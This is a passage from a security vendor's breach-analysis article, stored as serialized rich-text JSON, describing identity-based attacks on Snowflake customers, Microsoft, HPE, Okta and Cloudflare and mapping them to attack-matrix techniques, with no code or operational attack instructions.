that accounts are using SSO (and therefore are protected by MFA at the IdP level). However, due to the existence of ",{"data":72118,"content":72120,"nodeType":883},{"uri":72119},"https://pushsecurity.com/resources/browser-identity-attacks-matrix/ghost-logins",[72121],{"data":72122,"marks":72123,"value":19137,"nodeType":864},{},[72124],{"type":1455},{"data":72126,"marks":72127,"value":3731,"nodeType":864},{},[],{"data":72129,"marks":72130,"value":72132,"nodeType":864},{},[72131],{"type":899},"local logins without MFA can exist simultaneously with the SSO login unless expressly disabled",{"data":72134,"marks":72135,"value":72136,"nodeType":864},{},[],". Organizations using Snowflake that are looking to lock down their accounts can ",{"data":72138,"content":72140,"nodeType":883},{"uri":72139},"https://pushsecurity.com/resources/video/demonstrating-ghost-logins-in-snowflake-and-how-to-remediate-them/",[72141],{"data":72142,"marks":72143,"value":72145,"nodeType":864},{},[72144],{"type":1455},"watch our recent demo of how to effectively remediate this vulnerability in Snowflake",{"data":72147,"marks":72148,"value":48835,"nodeType":864},{},[],{"data":72150,"content":72151,"nodeType":945},{},[72152],{"data":72153,"content":72154,"nodeType":860},{},[72155,72160,72164,72173],{"data":72156,"marks":72157,"value":72159,"nodeType":864},{},[72158],{"type":899},"80% of the credentials were gathered through infostealer malware",{"data":72161,"marks":72162,"value":72163,"nodeType":864},{},[],". Typically, this occurs when unmanaged devices are used to access company resources, or personal browser profiles are synchronized on both work and personal devices. Malware deployed to an insecure personal device can then access and steal credentials for company resources. This situation usually occurs when working with third-party contractors on a BYOD basis; ",{"data":72165,"content":72167,"nodeType":883},{"uri":72166},"https://www.wired.com/story/epam-snowflake-ticketmaster-breach-shinyhunters/",[72168],{"data":72169,"marks":72170,"value":72172,"nodeType":864},{},[72171],{"type":1455},"a recent article indicates that Ukraine-based EPAM Systems",{"data":72174,"marks":72175,"value":72176,"nodeType":864},{},[],", an engineering and digital service provider and “Elite Tier Partner” of Snowflake, was one such organization breached in this way. Organizations consuming Snowflake-related services from EPAM were then subsequently affected, as the compromise of EPAM users granted access to a large number of Snowflake credentials for various company tenants.  ",{"data":72178,"content":72179,"nodeType":945},{},[72180],{"data":72181,"content":72182,"nodeType":860},{},[72183,72187,72192,72196,72201],{"data":72184,"marks":72185,"value":72186,"nodeType":864},{},[],"While attacker activity has focused on Snowflake to date, the success of this attack will signal the potential for further credential based attacks against similar apps. ",{"data":72188,"marks":72189,"value":72191,"nodeType":864},{},[72190],{"type":899},"There may already be a 'Snowflake 2.0' among the credentials already available online",{"data":72193,"marks":72194,"value":72195,"nodeType":864},{},[],". Further, credentials can be used against a wide range of apps to capitalize on potential ",{"data":72197,"marks":72198,"value":72200,"nodeType":864},{},[72199],{"type":899},"password reuse (which we see for 1 in 3 employees)",{"data":72202,"marks":72203,"value":72204,"nodeType":864},{},[],", so the exact creds for a particular app don’t have to be explicitly breached, so long as the domain for the login portal can be guessed or has been exposed elsewhere.   ",{"data":72206,"content":72207,"nodeType":1312},{},[72208],{"data":72209,"marks":72210,"value":72211,"nodeType":864},{},[],"Browser & Identity Attacks Matrix mapping",{"data":72213,"content":72214,"nodeType":860},{},[72215],{"data":72216,"marks":72217,"value":72218,"nodeType":864},{},[],"For more information on each TTP please navigate to the entries linked in the table below. ",{"data":72220,"content":72221,"nodeType":4845},{},[72222,72265,72327],{"data":72223,"content":72224,"nodeType":4581},{},[72225,72235,72245,72255],{"data":72226,"content":72227,"nodeType":7282},{},[72228],{"data":72229,"content":72230,"nodeType":860},{},[72231],{"data":72232,"marks":72233,"value":72234,"nodeType":864},{},[],"ID",{"data":72236,"content":72237,"nodeType":7282},{},[72238],{"data":72239,"content":72240,"nodeType":860},{},[72241],{"data":72242,"marks":72243,"value":72244,"nodeType":864},{},[],"Name",{"data":72246,"content":72247,"nodeType":7282},{},[72248],{"data":72249,"content":72250,"nodeType":860},{},[72251],{"data":72252,"marks":72253,"value":72254,"nodeType":864},{},[],"Stage",{"data":72256,"content":72257,"nodeType":7282},{},[72258],{"data":72259,"content":72260,"nodeType":860},{},[72261],{"data":72262,"marks":72263,"value":72264,"nodeType":864},{},[],"Description",{"data":72266,"content":72267,"nodeType":4581},{},[72268,72288,72307,72317],{"data":72269,"content":72270,"nodeType":4569},{},[72271],{"data":72272,"content":72273,"nodeType":860},{},[72274,72277,72285],{"data":72275,"marks":72276,"value":21,"nodeType":864},{},[],{"data":72278,"content":72279,"nodeType":883},{"uri":19131},[72280],{"data":72281,"marks":72282,"value":72284,"nodeType":864},{},[72283],{"type":1455},"SAT1017",{"data":72286,"marks":72287,"value":21,"nodeType":864},{},[],{"data":72289,"content":72290,"nodeType":4569},{},[72291],{"data":72292,"content":72293,"nodeType":860},{},[72294,72297,72304],{"data":72295,"marks":72296,"value":21,"nodeType":864},{},[],{"data":72298,"content":72299,"nodeType":883},{"uri":72119},[72300],{"data":72301,"marks":72302,"value":395,"nodeType":864},{},[72303],{"type":1455},{"data":72305,"marks":72306,"value":21,"nodeType":864},{},[],{"data":72308,"content":72309,"nodeType":4569},{},[72310],{"data":72311,"content":72312,"nodeType":860},{},[72313],{"data":72314,"marks":72315,"value":72316,"nodeType":864},{},[],"Initial Access; Persistence; Defense Evasion",{"data":72318,"content":72319,"nodeType":4569},{},[72320],{"data":72321,"content":72322,"nodeType":860},{},[72323],{"data":72324,"marks":72325,"value":72326,"nodeType":864},{},[],"Abusing non-SSO additional login methods such as password-based authentication (local to the SaaS app), social logins, API access, etc. ",{"data":72328,"content":72329,"nodeType":4581},{},[72330,72351,72372,72382],{"data":72331,"content":72332,"nodeType":4569},{},[72333],{"data":72334,"content":72335,"nodeType":860},{},[72336,72339,72348],{"data":72337,"marks":72338,"value":21,"nodeType":864},{},[],{"data":72340,"content":72342,"nodeType":883},{"uri":72341},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/session_cookie_theft/description.md",[72343],{"data":72344,"marks":72345,"value":72347,"nodeType":864},{},[72346],{"type":1455},"SAT1044",{"data":72349,"marks":72350,"value":21,"nodeType":864},{},[],{"data":72352,"content":72353,"nodeType":4569},{},[72354],{"data":72355,"content":72356,"nodeType":860},{},[72357,72360,72369],{"data":72358,"marks":72359,"value":21,"nodeType":864},{},[],{"data":72361,"content":72363,"nodeType":883},{"uri":72362},"https://pushsecurity.com/resources/browser-identity-attacks-matrix/session-cookie-theft",[72364],{"data":72365,"marks":72366,"value":72368,"nodeType":864},{},[72367],{"type":1455},"Session cookie theft",{"data":72370,"marks":72371,"value":21,"nodeType":864},{},[],{"data":72373,"content":72374,"nodeType":4569},{},[72375],{"data":72376,"content":72377,"nodeType":860},{},[72378],{"data":72379,"marks":72380,"value":72381,"nodeType":864},{},[],"Lateral Movement; Defense Evasion",{"data":72383,"content":72384,"nodeType":4569},{},[72385],{"data":72386,"content":72387,"nodeType":860},{},[72388],{"data":72389,"marks":72390,"value":72391,"nodeType":864},{},[],"Session cookies are used to pivot from an endpoint compromise and laterally move to downstream SaaS applications.",{"data":72393,"content":72394,"nodeType":1312},{},[72395],{"data":72396,"marks":72397,"value":72398,"nodeType":864},{},[],"Related breaches",{"data":72400,"content":72401,"nodeType":860},{},[72402],{"data":72403,"marks":72404,"value":72405,"nodeType":864},{},[],"Named victims are listed below:",{"data":72407,"content":72408,"nodeType":941},{},[72409,72419,72429,72439,72449,72459,72469,72479],{"data":72410,"content":72411,"nodeType":945},{},[72412],{"data":72413,"content":72414,"nodeType":860},{},[72415],{"data":72416,"marks":72417,"value":72418,"nodeType":864},{},[],"Ticketmaster",{"data":72420,"content":72421,"nodeType":945},{},[72422],{"data":72423,"content":72424,"nodeType":860},{},[72425],{"data":72426,"marks":72427,"value":72428,"nodeType":864},{},[],"Santander",{"data":72430,"content":72431,"nodeType":945},{},[72432],{"data":72433,"content":72434,"nodeType":860},{},[72435],{"data":72436,"marks":72437,"value":72438,"nodeType":864},{},[],"Neiman Marcus",{"data":72440,"content":72441,"nodeType":945},{},[72442],{"data":72443,"content":72444,"nodeType":860},{},[72445],{"data":72446,"marks":72447,"value":72448,"nodeType":864},{},[],"Los Angeles Unified",{"data":72450,"content":72451,"nodeType":945},{},[72452],{"data":72453,"content":72454,"nodeType":860},{},[72455],{"data":72456,"marks":72457,"value":72458,"nodeType":864},{},[],"Pure Storage",{"data":72460,"content":72461,"nodeType":945},{},[72462],{"data":72463,"content":72464,"nodeType":860},{},[72465],{"data":72466,"marks":72467,"value":72468,"nodeType":864},{},[],"Advance Auto Parts",{"data":72470,"content":72471,"nodeType":945},{},[72472],{"data":72473,"content":72474,"nodeType":860},{},[72475],{"data":72476,"marks":72477,"value":72478,"nodeType":864},{},[],"Truist Bank",{"data":72480,"content":72481,"nodeType":945},{},[72482],{"data":72483,"content":72484,"nodeType":860},{},[72485],{"data":72486,"marks":72487,"value":72488,"nodeType":864},{},[],"Lending Tree",{"data":72490,"content":72491,"nodeType":1005},{},[],{"data":72493,"content":72494,"nodeType":1009},{},[72495],{"data":72496,"marks":72497,"value":72498,"nodeType":864},{},[],"Microsoft — January 2024",{"data":72500,"content":72501,"nodeType":860},{},[72502],{"data":72503,"marks":72504,"value":72505,"nodeType":864},{},[],"The threat group known as APT29 (also known as “The Dukes”, “Cozy Bear”, and labeled “Midnight Blizzard” by Microsoft) executed a cleverly executed password-guessing attack to compromise test cloud identities that were also lacking MFA. Attackers then leveraged this access to compromise some OAuth applications that allowed lateral movement to Microsoft’s corporate environment and the creation of other malicious OAuth applications to achieve persistence.",{"data":72507,"content":72508,"nodeType":1312},{},[72509],{"data":72510,"marks":72511,"value":72512,"nodeType":864},{},[],"How did Microsoft get breached?",{"data":72514,"content":72515,"nodeType":941},{},[72516,72526,72536,72546,72556,72566],{"data":72517,"content":72518,"nodeType":945},{},[72519],{"data":72520,"content":72521,"nodeType":860},{},[72522],{"data":72523,"marks":72524,"value":72525,"nodeType":864},{},[],"APT29 utilized password spraying / credential stuffing attacks to compromise test cloud identities that were also lacking MFA, attached to a non-production test tenant.",{"data":72527,"content":72528,"nodeType":945},{},[72529],{"data":72530,"content":72531,"nodeType":860},{},[72532],{"data":72533,"marks":72534,"value":72535,"nodeType":864},{},[],"APT29 leveraged their initial access to the test tenant to identify and compromise a test OAuth application that had access to the Microsoft corporate environment by leveraging permissive Entra ID roles in the test tenant.",{"data":72537,"content":72538,"nodeType":945},{},[72539],{"data":72540,"content":72541,"nodeType":860},{},[72542],{"data":72543,"marks":72544,"value":72545,"nodeType":864},{},[],"APT29 used the existing configurations to access the Microsoft corporate Entra ID tenant whereupon the app registration from the test tenant was installed as a service principal in the corporate tenant, granting the equivalent of global admin rights.",{"data":72547,"content":72548,"nodeType":945},{},[72549],{"data":72550,"content":72551,"nodeType":860},{},[72552],{"data":72553,"marks":72554,"value":72555,"nodeType":864},{},[],"Using these new permissions, APT29 registered additional malicious OAuth applications in the Microsoft corporate environment, and created a new user in the Microsoft corporate tenant to grant consent to the new malicious OAuth apps, thereby achieving persistent access to the environment.",{"data":72557,"content":72558,"nodeType":945},{},[72559],{"data":72560,"content":72561,"nodeType":860},{},[72562],{"data":72563,"marks":72564,"value":72565,"nodeType":864},{},[],"APT29 leveraged the elevated (maximum) privileges assigned to the ‘test’ app service principal to grant app roles to other newly created app service principals, granting them the Office 365 Exchange Online full_access_as_app role in the corporate tenant, which allows access to mailboxes.",{"data":72567,"content":72568,"nodeType":945},{},[72569],{"data":72570,"content":72571,"nodeType":860},{},[72572],{"data":72573,"marks":72574,"value":72575,"nodeType":864},{},[],"APT29 leveraged these malicious OAuth applications to authenticate to Microsoft Exchange Online and target Microsoft corporate email accounts.",{"data":72577,"content":72578,"nodeType":1312},{},[72579],{"data":72580,"marks":72581,"value":72582,"nodeType":864},{},[],"What was the impact of the Microsoft breach?",{"data":72584,"content":72585,"nodeType":941},{},[72586,72596,72606],{"data":72587,"content":72588,"nodeType":945},{},[72589],{"data":72590,"content":72591,"nodeType":860},{},[72592],{"data":72593,"marks":72594,"value":72595,"nodeType":864},{},[],"APT29 had access to Microsoft corporate email accounts, including members of the senior leadership team and employees in the cybersecurity, legal, and other functions, resulting in sensitive data leakage.",{"data":72597,"content":72598,"nodeType":945},{},[72599],{"data":72600,"content":72601,"nodeType":860},{},[72602],{"data":72603,"marks":72604,"value":72605,"nodeType":864},{},[],"Microsoft has not disclosed any further impacts at this time, but it is likely that the adversary had complete, unmitigated control of the Microsoft corporate tenant for a period of time, with global administrator level access.",{"data":72607,"content":72608,"nodeType":945},{},[72609],{"data":72610,"content":72611,"nodeType":860},{},[72612],{"data":72613,"marks":72614,"value":72615,"nodeType":864},{},[],"Since the initial attack there has been evidence of continued targeting, with password spraying attacks reportedly increasing tenfold, likely informed by stolen information.",{"data":72617,"content":72618,"nodeType":1312},{},[72619],{"data":72620,"marks":72621,"value":72622,"nodeType":864},{},[],"What stands out in the Microsoft breach?",{"data":72624,"content":72625,"nodeType":941},{},[72626,72636,72646,72656],{"data":72627,"content":72628,"nodeType":945},{},[72629],{"data":72630,"content":72631,"nodeType":860},{},[72632],{"data":72633,"marks":72634,"value":72635,"nodeType":864},{},[],"The attack was covert and targeted, with APT29 tailoring the attack to a limited number of accounts and using a low number of attempts to evade detection and avoid account blocks based on the volume of failures.",{"data":72637,"content":72638,"nodeType":945},{},[72639],{"data":72640,"content":72641,"nodeType":860},{},[72642],{"data":72643,"marks":72644,"value":72645,"nodeType":864},{},[],"APT29 used residential proxy networks when interacting with the compromised tenant and, subsequently, with Exchange Online to obfuscate the source of their attack and avoid impossible travel detections. ",{"data":72647,"content":72648,"nodeType":945},{},[72649],{"data":72650,"content":72651,"nodeType":860},{},[72652],{"data":72653,"marks":72654,"value":72655,"nodeType":864},{},[],"APT29 demonstrated mature and in-depth understanding of cloud infrastructure, protocols, and workflows, particularly in terms of privilege escalation and lateral movement.",{"data":72657,"content":72658,"nodeType":945},{},[72659],{"data":72660,"content":72661,"nodeType":860},{},[72662],{"data":72663,"marks":72664,"value":72665,"nodeType":864},{},[],"If even Microsoft (an organization with pretty much unrivaled security resources) can’t ensure that all their accounts are protected by MFA and that there are no weak links between test/dev and prod systems, this should be a wake-up call for any company that thinks their MFA implementation is flawless. ",{"data":72667,"content":72668,"nodeType":1312},{},[72669],{"data":72670,"marks":72671,"value":72211,"nodeType":864},{},[],{"data":72673,"content":72674,"nodeType":860},{},[72675],{"data":72676,"marks":72677,"value":72218,"nodeType":864},{},[],{"data":72679,"content":72680,"nodeType":4845},{},[72681,72721,72784,72848],{"data":72682,"content":72683,"nodeType":4581},{},[72684,72693,72703,72712],{"data":72685,"content":72686,"nodeType":7282},{},[72687],{"data":72688,"content":72689,"nodeType":860},{},[72690],{"data":72691,"marks":72692,"value":72234,"nodeType":864},{},[],{"data":72694,"content":72695,"nodeType":7282},{},[72696],{"data":72697,"content":72698,"nodeType":860},{},[72699],{"data":72700,"marks":72701,"value":72702,"nodeType":864},{},[],"Technique",{"data":72704,"content":72705,"nodeType":7282},{},[72706],{"data":72707,"content":72708,"nodeType":860},{},[72709],{"data":72710,"marks":72711,"value":72254,"nodeType":864},{},[],{"data":72713,"content":72714,"nodeType":7282},{},[72715],{"data":72716,"content":72717,"nodeType":860},{},[72718],{"data":72719,"marks":72720,"value":72264,"nodeType":864},{},[],{"data":72722,"content":72723,"nodeType":4581},{},[72724,72744,72764,72774],{"data":72725,"content":72726,"nodeType":4569},{},[72727],{"data":72728,"content":72729,"nodeType":860},{},[72730,72733,72741],{"data":72731,"marks":72732,"value":21,"nodeType":864},{},[],{"data":72734,"content":72735,"nodeType":883},{"uri":66159},[72736],{"data":72737,"marks":72738,"value":72740,"nodeType":864},{},[72739],{"type":1455},"SAT1011",{"data":72742,"marks":72743,"value":21,"nodeType":864},{},[],{"data":72745,"content":72746,"nodeType":4569},{},[72747],{"data":72748,"content":72749,"nodeType":860},{},[72750,72753,72761],{"data":72751,"marks":72752,"value":21,"nodeType":864},{},[],{"data":72754,"content":72756,"nodeType":883},{"uri":72755},"https://pushsecurity.com/resources/browser-identity-attacks-matrix/credential-stuffing",[72757],{"data":72758,"marks":72759,"value":333,"nodeType":864},{},[72760],{"type":1455},{"data":72762,"marks":72763,"value":21,"nodeType":864},{},[],{"data":72765,"content":72766,"nodeType":4569},{},[72767],{"data":72768,"content":72769,"nodeType":860},{},[72770],{"data":72771,"marks":72772,"value":72773,"nodeType":864},{},[],"Initial Access",{"data":72775,"content":72776,"nodeType":4569},{},[72777],{"data":72778,"content":72779,"nodeType":860},{},[72780],{"data":72781,"marks":72782,"value":72783,"nodeType":864},{},[],"Attempt to authenticate to a SaaS account by guessing a large number of passwords ",{"data":72785,"content":72786,"nodeType":4581},{},[72787,72807,72828,72838],{"data":72788,"content":72789,"nodeType":4569},{},[72790],{"data":72791,"content":72792,"nodeType":860},{},[72793,72796,72804],{"data":72794,"marks":72795,"value":21,"nodeType":864},{},[],{"data":72797,"content":72798,"nodeType":883},{"uri":59936},[72799],{"data":72800,"marks":72801,"value":72803,"nodeType":864},{},[72802],{"type":1455},"SAT1027",{"data":72805,"marks":72806,"value":21,"nodeType":864},{},[],{"data":72808,"content":72809,"nodeType":4569},{},[72810],{"data":72811,"content":72812,"nodeType":860},{},[72813,72816,72825],{"data":72814,"marks":72815,"value":21,"nodeType":864},{},[],{"data":72817,"content":72819,"nodeType":883},{"uri":72818},"https://pushsecurity.com/resources/browser-identity-attacks-matrix/oauth-tokens",[72820],{"data":72821,"marks":72822,"value":72824,"nodeType":864},{},[72823],{"type":1455},"OAuth tokens",{"data":72826,"marks":72827,"value":21,"nodeType":864},{},[],{"data":72829,"content":72830,"nodeType":4569},{},[72831],{"data":72832,"content":72833,"nodeType":860},{},[72834],{"data":72835,"marks":72836,"value":72837,"nodeType":864},{},[],"Execution; Persistence; Defense Evasion",{"data":72839,"content":72840,"nodeType":4569},{},[72841],{"data":72842,"content":72843,"nodeType":860},{},[72844],{"data":72845,"marks":72846,"value":72847,"nodeType":864},{},[],"Use a malicious OAuth app to create an OAuth token, using arbitrary permissions to maintain long-term programmatic access to a compromised user account.",{"data":72849,"content":72850,"nodeType":4581},{},[72851,72871,72892,72902],{"data":72852,"content":72853,"nodeType":4569},{},[72854],{"data":72855,"content":72856,"nodeType":860},{},[72857,72860,72868],{"data":72858,"marks":72859,"value":21,"nodeType":864},{},[],{"data":72861,"content":72862,"nodeType":883},{"uri":61409},[72863],{"data":72864,"marks":72865,"value":72867,"nodeType":864},{},[72866],{"type":1455},"SAT1001",{"data":72869,"marks":72870,"value":21,"nodeType":864},{},[],{"data":72872,"content":72873,"nodeType":4569},{},[72874],{"data":72875,"content":72876,"nodeType":860},{},[72877,72880,72889],{"data":72878,"marks":72879,"value":21,"nodeType":864},{},[],{"data":72881,"content":72883,"nodeType":883},{"uri":72882},"https://pushsecurity.com/resources/browser-identity-attacks-matrix/abuse-existing-oauth-integrations",[72884],{"data":72885,"marks":72886,"value":72888,"nodeType":864},{},[72887],{"type":1455},"Abuse existing OAuth integrations",{"data":72890,"marks":72891,"value":21,"nodeType":864},{},[],{"data":72893,"content":72894,"nodeType":4569},{},[72895],{"data":72896,"content":72897,"nodeType":860},{},[72898],{"data":72899,"marks":72900,"value":72901,"nodeType":864},{},[],"Privilege Escalation;\nLateral Movement",{"data":72903,"content":72904,"nodeType":4569},{},[72905],{"data":72906,"content":72907,"nodeType":860},{},[72908],{"data":72909,"marks":72910,"value":72911,"nodeType":864},{},[],"If an adversary compromises a SaaS account integrated with other apps, they can escalate privileges and move laterally to other apps.",{"data":72913,"content":72914,"nodeType":1312},{},[72915],{"data":72916,"marks":72917,"value":72398,"nodeType":864},{},[],{"data":72919,"content":72920,"nodeType":860},{},[72921],{"data":72922,"marks":72923,"value":72925,"nodeType":864},{},[72924],{"type":899},"Hewlett Packard Enterprise (HPE) — May 2023",{"data":72927,"content":72928,"nodeType":860},{},[72929],{"data":72930,"marks":72931,"value":72932,"nodeType":864},{},[],"At the time of the Microsoft breach becoming public knowledge, HPE disclosed that they had become aware of a historical incident in Dec 2023, involving unauthorized access to and exfiltration of a limited number of SharePoint files as early as May 2023. Hackers accessed and exfiltrated data from HPE mailboxes belonging to individuals in the cybersecurity, go-to-market, business segments, and other functions. No further information is available on the techniques used or impact of the breach. ",{"data":72934,"content":72935,"nodeType":1005},{},[],{"data":72937,"content":72938,"nodeType":1009},{},[72939],{"data":72940,"marks":72941,"value":72942,"nodeType":864},{},[],"Okta — October 2023",{"data":72944,"content":72945,"nodeType":860},{},[72946],{"data":72947,"marks":72948,"value":72949,"nodeType":864},{},[],"An unknown threat group compromised an Okta employee's personal Google account that was being used on a company-managed device, granting the threat actor access to a service account for Okta’s customer support system, that included session tokens for 134 customers. This was then used to hijack the legitimate Okta sessions of five customers. ",{"data":72951,"content":72952,"nodeType":1312},{},[72953],{"data":72954,"marks":72955,"value":72956,"nodeType":864},{},[],"How did Okta get breached?",{"data":72958,"content":72959,"nodeType":941},{},[72960,72970,72980,72990,73000],{"data":72961,"content":72962,"nodeType":945},{},[72963],{"data":72964,"content":72965,"nodeType":860},{},[72966],{"data":72967,"marks":72968,"value":72969,"nodeType":864},{},[],"The threat actor compromised a personal Google account that the user had accessed from their Okta-managed work device by signing into their personal profile from the Chrome browser.",{"data":72971,"content":72972,"nodeType":945},{},[72973],{"data":72974,"content":72975,"nodeType":860},{},[72976],{"data":72977,"marks":72978,"value":72979,"nodeType":864},{},[],"The personal account credentials are likely to have been compromised in a historical data breach and did not have MFA enabled.",{"data":72981,"content":72982,"nodeType":945},{},[72983],{"data":72984,"content":72985,"nodeType":860},{},[72986],{"data":72987,"marks":72988,"value":72989,"nodeType":864},{},[],"The username and password of a service account for Okta’s customer support system had been saved into the employee’s personal Google account and was therefore compromised.",{"data":72991,"content":72992,"nodeType":945},{},[72993],{"data":72994,"content":72995,"nodeType":860},{},[72996],{"data":72997,"marks":72998,"value":72999,"nodeType":864},{},[],"The threat actor was able to access the service account by logging in using the stolen credentials, which again likely did not have MFA deployed as a service account.",{"data":73001,"content":73002,"nodeType":945},{},[73003],{"data":73004,"content":73005,"nodeType":860},{},[73006],{"data":73007,"marks":73008,"value":73009,"nodeType":864},{},[],"The threat actor was able to use session tokens in the HAR files to impersonate staff and hijack the legitimate Okta sessions of five customers, including 1Password, BeyondTrust, and Cloudflare.",{"data":73011,"content":73012,"nodeType":1312},{},[73013],{"data":73014,"marks":73015,"value":73016,"nodeType":864},{},[],"What was the impact of the Okta breach?",{"data":73018,"content":73019,"nodeType":941},{},[73020,73030,73040,73050],{"data":73021,"content":73022,"nodeType":945},{},[73023],{"data":73024,"content":73025,"nodeType":860},{},[73026],{"data":73027,"marks":73028,"value":73029,"nodeType":864},{},[],"The threat actor gained unauthorized access to files inside Okta’s customer support system associated with 134 Okta customers.",{"data":73031,"content":73032,"nodeType":945},{},[73033],{"data":73034,"content":73035,"nodeType":860},{},[73036],{"data":73037,"marks":73038,"value":73039,"nodeType":864},{},[],"The threat actor was able to use these session tokens to hijack the legitimate Okta sessions of 5 (publicly disclosed) customers.",{"data":73041,"content":73042,"nodeType":945},{},[73043],{"data":73044,"content":73045,"nodeType":860},{},[73046],{"data":73047,"marks":73048,"value":73049,"nodeType":864},{},[],"Okta originally claimed the breach had impacted only 1% of customers, but later found that a report run and downloaded by the threat actor contained the names and email addresses of all 18,400 Okta customer support users, as well as some Okta employee information, meaning 100% of customer support users were impacted.",{"data":73051,"content":73052,"nodeType":945},{},[73053],{"data":73054,"content":73055,"nodeType":860},{},[73056],{"data":73057,"marks":73058,"value":73059,"nodeType":864},{},[],"Okta users are at higher risk of phishing and credential stuffing attacks based on the data stolen by the threat actor, increasing the importance of robust MFA implementation.",{"data":73061,"content":73062,"nodeType":1312},{},[73063],{"data":73064,"marks":73065,"value":73066,"nodeType":864},{},[],"What stands out in the Okta breach?",{"data":73068,"content":73069,"nodeType":941},{},[73070,73080,73090],{"data":73071,"content":73072,"nodeType":945},{},[73073],{"data":73074,"content":73075,"nodeType":860},{},[73076],{"data":73077,"marks":73078,"value":73079,"nodeType":864},{},[],"This attack demonstrates the risk associated with cloud Identity Providers and the potential goldmine that they are to attackers. Much in the same way that the manufacturers of physical and virtual network appliances are continuously probed for software vulnerabilities, cloud IdPs like Okta present a huge potential opportunity, both in terms of targeting specific organizational instances as well as the Okta organization. This attack showcases the possibility of third-party supply chain attacks to target downstream organizations using IdP services. ",{"data":73081,"content":73082,"nodeType":945},{},[73083],{"data":73084,"content":73085,"nodeType":860},{},[73086],{"data":73087,"marks":73088,"value":73089,"nodeType":864},{},[],"Similar to the Microsoft breach, gaps were discovered and exploited in Okta’s MFA coverage and implementation, highlighting that there are gaps in even the most mature organizations. ",{"data":73091,"content":73092,"nodeType":945},{},[73093],{"data":73094,"content":73095,"nodeType":860},{},[73096],{"data":73097,"marks":73098,"value":73099,"nodeType":864},{},[],"The subsequent attack on Cloudflare (see below) and the scale of the recovery effort demonstrates the significant operational overhead in responding to and recovering from a breach of identity infrastructure, with a similar or greater scale than a traditional Active Directory compromise. While addressing the incident, Cloudflare's staff rotated all production credentials (over 5,000 unique ones), physically segmented test and staging systems, performed forensic triage on 4,893 systems, reimaged and rebooted all systems on the company's global network, including all Atlassian servers (Jira, Confluence, and Bitbucket) and machines accessed by the threat actor. All equipment in Cloudflare's Brazil data center, which was unsuccessfully targeted by the threat actor, was later returned to the manufacturers to ensure that the data center was secure.",{"data":73101,"content":73102,"nodeType":1312},{},[73103],{"data":73104,"marks":73105,"value":72211,"nodeType":864},{},[],{"data":73107,"content":73108,"nodeType":860},{},[73109],{"data":73110,"marks":73111,"value":72218,"nodeType":864},{},[],{"data":73113,"content":73114,"nodeType":4845},{},[73115,73154,73213],{"data":73116,"content":73117,"nodeType":4581},{},[73118,73127,73136,73145],{"data":73119,"content":73120,"nodeType":7282},{},[73121],{"data":73122,"content":73123,"nodeType":860},{},[73124],{"data":73125,"marks":73126,"value":72234,"nodeType":864},{},[],{"data":73128,"content":73129,"nodeType":7282},{},[73130],{"data":73131,"content":73132,"nodeType":860},{},[73133],{"data":73134,"marks":73135,"value":72702,"nodeType":864},{},[],{"data":73137,"content":73138,"nodeType":7282},{},[73139],{"data":73140,"content":73141,"nodeType":860},{},[73142],{"data":73143,"marks":73144,"value":72254,"nodeType":864},{},[],{"data":73146,"content":73147,"nodeType":7282},{},[73148],{"data":73149,"content":73150,"nodeType":860},{},[73151],{"data":73152,"marks":73153,"value":72264,"nodeType":864},{},[],{"data":73155,"content":73156,"nodeType":4581},{},[73157,73176,73195,73204],{"data":73158,"content":73159,"nodeType":4569},{},[73160],{"data":73161,"content":73162,"nodeType":860},{},[73163,73166,73173],{"data":73164,"marks":73165,"value":21,"nodeType":864},{},[],{"data":73167,"content":73168,"nodeType":883},{"uri":66159},[73169],{"data":73170,"marks":73171,"value":72740,"nodeType":864},{},[73172],{"type":1455},{"data":73174,"marks":73175,"value":21,"nodeType":864},{},[],{"data":73177,"content":73178,"nodeType":4569},{},[73179],{"data":73180,"content":73181,"nodeType":860},{},[73182,73185,73192],{"data":73183,"marks":73184,"value":21,"nodeType":864},{},[],{"data":73186,"content":73187,"nodeType":883},{"uri":72755},[73188],{"data":73189,"marks":73190,"value":333,"nodeType":864},{},[73191],{"type":1455},{"data":73193,"marks":73194,"value":21,"nodeType":864},{},[],{"data":73196,"content":73197,"nodeType":4569},{},[73198],{"data":73199,"content":73200,"nodeType":860},{},[73201],{"data":73202,"marks":73203,"value":72773,"nodeType":864},{},[],{"data":73205,"content":73206,"nodeType":4569},{},[73207],{"data":73208,"content":73209,"nodeType":860},{},[73210],{"data":73211,"marks":73212,"value":72783,"nodeType":864},{},[],{"data":73214,"content":73215,"nodeType":4581},{},[73216,73237,73258,73268],{"data":73217,"content":73218,"nodeType":4569},{},[73219],{"data":73220,"content":73221,"nodeType":860},{},[73222,73225,73234],{"data":73223,"marks":73224,"value":21,"nodeType":864},{},[],{"data":73226,"content":73228,"nodeType":883},{"uri":73227},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/password_scraping/description.md",[73229],{"data":73230,"marks":73231,"value":73233,"nodeType":864},{},[73232],{"type":1455},"SAT1028",{"data":73235,"marks":73236,"value":21,"nodeType":864},{},[],{"data":73238,"content":73239,"nodeType":4569},{},[73240],{"data":73241,"content":73242,"nodeType":860},{},[73243,73246,73255],{"data":73244,"marks":73245,"value":21,"nodeType":864},{},[],{"data":73247,"content":73249,"nodeType":883},{"uri":73248},"https://pushsecurity.com/resources/browser-identity-attacks-matrix/password-scraping",[73250],{"data":73251,"marks":73252,"value":73254,"nodeType":864},{},[73253],{"type":1455},"Password Scraping",{"data":73256,"marks":73257,"value":21,"nodeType":864},{},[],{"data":73259,"content":73260,"nodeType":4569},{},[73261],{"data":73262,"content":73263,"nodeType":860},{},[73264],{"data":73265,"marks":73266,"value":73267,"nodeType":864},{},[],"Credential Access",{"data":73269,"content":73270,"nodeType":4569},{},[73271],{"data":73272,"content":73273,"nodeType":860},{},[73274],{"data":73275,"marks":73276,"value":73277,"nodeType":864},{},[],"Collection of credentials and secrets from repositories e.g. password managers, SaaS file stores, etc.",{"data":73279,"content":73280,"nodeType":1312},{},[73281],{"data":73282,"marks":73283,"value":72398,"nodeType":864},{},[],{"data":73285,"content":73286,"nodeType":860},{},[73287],{"data":73288,"marks":73289,"value":73291,"nodeType":864},{},[73290],{"type":899},"Cloudflare — November 2023",{"data":73293,"content":73294,"nodeType":860},{},[73295],{"data":73296,"marks":73297,"value":73298,"nodeType":864},{},[],"The threat actor used tokens and credentials that had not been rotated to breach Cloudflare’s internal Atlassian server and access its Confluence wiki, Jira bug database, and Bitbucket source code management system. The threat actor first gained access to Cloudflare's self-hosted Atlassian server and then accessed the company's Confluence and Jira systems following a reconnaissance stage. Cloudflare says that this breach did not impact customer data or systems or the provision of 